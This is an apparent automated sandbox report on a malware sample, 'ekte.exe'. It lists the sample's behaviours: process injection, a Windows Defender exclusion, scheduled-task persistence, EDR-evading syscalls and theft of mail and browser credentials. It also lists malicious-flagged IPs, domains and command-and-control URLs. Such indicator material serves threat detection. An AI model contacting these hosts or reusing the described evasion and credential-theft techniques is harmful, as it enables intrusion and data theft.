behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1538477 Sample: ekte.exe Startdate: 21/10/2024 Architecture: WINDOWS Score: 100 57 www.martaschrimpf.info 2->57 77 Suricata IDS alerts for network traffic 2->77 79 Malicious sample detected (through community Yara rule) 2->79 81 Antivirus / Scanner detection for submitted sample 2->81 83 8 other signatures 2->83 10 ekte.exe 1 11 2->10         started        14 taskeng.exe 1 2->14         started        signatures3 process4 file5 51 C:\Users\user\AppData\...\eFDiSxeTfjUqTk.exe, PE32 10->51 dropped 53 C:\...\eFDiSxeTfjUqTk.exe:Zone.Identifier, ASCII 10->53 dropped 55 C:\Users\user\AppData\Local\...\tmp47BA.tmp, XML 10->55 dropped 93 Uses schtasks.exe or at.exe to add and modify task schedules 10->93 95 Adds a directory exclusion to Windows Defender 10->95 97 Injects a PE file into a foreign processes 10->97 16 ekte.exe 10->16         started        19 powershell.exe 4 10->19         started        21 powershell.exe 4 10->21         started        23 schtasks.exe 10->23         started        25 eFDiSxeTfjUqTk.exe 4 14->25         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 16->67 27 BuhvZTwGQCD.exe 16->27 injected 69 Antivirus detection for dropped file 25->69 71 Multi AV Scanner detection for dropped file 25->71 73 Machine Learning detection for dropped file 25->73 75 2 other signatures 25->75 30 schtasks.exe 25->30         started        32 eFDiSxeTfjUqTk.exe 25->32         started        34 powershell.exe 25->34         started        36 powershell.exe 25->36         started        process9 signatures10 99 Maps a DLL or memory area into another process 27->99 101 Found direct / indirect Syscall (likely to bypass EDR) 27->101 38 findstr.exe 1 21 27->38         started        process11 dnsIp12 59 www.sqlite.org 45.33.6.223, 49168, 49169, 80 LINODE-APLinodeLLCUS United States 38->59 49 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32 38->49 dropped 85 Tries to steal Mail credentials (via file / registry access) 38->85 87 Tries to harvest and steal browser information (history, passwords, etc) 38->87 89 Maps a DLL or memory area into another process 38->89 91 Queues an APC in another process (thread injection) 38->91 43 BuhvZTwGQCD.exe 38->43 injected 47 firefox.exe 38->47         started        file13 signatures14 process15 dnsIp16 61 www.guldeu.xyz 43->61 63 asiapartnars.online 15.197.148.33, 49178, 49179, 49180 TANDEMUS United States 43->63 65 11 other IPs or domains 43->65 103 Found direct / indirect Syscall (likely to bypass EDR) 43->103 signatures17 105 Performs DNS queries to domains with low reputation 61->105
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
162.0.238.246
 www.guldeu.xyz Canada
22612 NAMECHEAP-NETUS true
15.197.148.33
 childlesscatlady.today United States
7430 TANDEMUS true
45.33.6.223
 www.sqlite.org United States
63949 LINODE-APLinodeLLCUS false
185.174.173.22
 rockbull.pro Ukraine
21100 ITLDC-NLUA true
3.33.130.190
 deikamalaharris.info United States
8987 AMAZONEXPANSIONGB true
206.119.82.148
 wdgb23.top United States
174 COGENT-174US true

Contacted Domains

Name IP Active
bg.microsoft.map.fastly.net 199.232.210.172 true
rockbull.pro 185.174.173.22 true
wdgb23.top 206.119.82.148 true
www.martaschrimpf.info 208.91.197.27 true
www.guldeu.xyz 162.0.238.246 true
deikamalaharris.info 3.33.130.190 true
childlesscatlady.today 15.197.148.33 true
asiapartnars.online 15.197.148.33 true
www.sqlite.org 45.33.6.223 true
www.timetime.store unknown unknown
www.childlesscatlady.today unknown unknown
www.rockbull.pro unknown unknown
www.asiapartnars.online unknown unknown
www.wdgb23.top unknown unknown
www.deikamalaharris.info unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.wdgb23.top/v5ff/?o0I8bJWh=6KtkYrJQJQPjnaYYjYn2UYf3+tCUC2UyI0IqyotYPNah/j4zRWdFJ7rRvhmSGGewLKOTJjNwEsTAi0VkpGXovzF7okvrkNx58uXZpArpUgDeiKoUGkOd+5nnUTXs&IzCDX=JREpwHC8S true
    		unknown
    http://www.rockbull.pro/0804/?o0I8bJWh=7cQ5BE5RBCqgXF7xrBGoHohDXivjQLfe2KgDJ9LuiE6tpBU04a3sAbwq5Q7Yjj3JjwmtcjT9zhxyx84N9Ed0ZJTtf47MgLeYfgSXfectTV2gRR6PHDayMxuKrOIC&IzCDX=JREpwHC8S true
      		unknown
      http://www.guldeu.xyz/qd68/ true
        		unknown
        http://www.childlesscatlady.today/0l08/ true
          		unknown
          http://www.sqlite.org/2021/sqlite-dll-win32-x86-3340000.zip false
            		unknown
            http://www.deikamalaharris.info/7qh8/?o0I8bJWh=30gz3aeCGXts4Q76IE+H941JnGeso7u8ST9k2gxA0wQlWv8qAc7eS7l6bdvqrf9uLD1EZ4RKxD3BFAyB/gyNnMcHzfUP1SI6JZ3kLHzdYP32mYCFOTVusz8SPvQZ&IzCDX=JREpwHC8S true
              		unknown
              http://www.guldeu.xyz/qd68/?o0I8bJWh=CMk3jWV7n2ud16JbSoz++xJaAy6tYmolV54GWsIImY9wr32Fxex2EERnMtANYc4DvCE1goWK72es3TtLYGEc3O5acPz147mgbIRl7hCPTM53qHiPKqWo/3UkWZwG&IzCDX=JREpwHC8S true
                		unknown
                http://www.childlesscatlady.today/0l08/?o0I8bJWh=WYzw3m0wqer1rwFfiUwXr6rnqmqwc587r0oEUdRC5DK7wXWam3jpYKn/a30V+PURl6w9nm91Zal+YxrVMngOiDDKZET7LCtjetsFGO1YqrEJE528b4AnIbgsZ84h&IzCDX=JREpwHC8S true
                  		unknown
                  http://www.rockbull.pro/0804/ true
                    		unknown
                    http://www.sqlite.org/2017/sqlite-dll-win32-x86-3180000.zip false
                      		unknown
                      http://www.asiapartnars.online/rmem/ true
                        		unknown
                        http://www.wdgb23.top/v5ff/ true
                          		unknown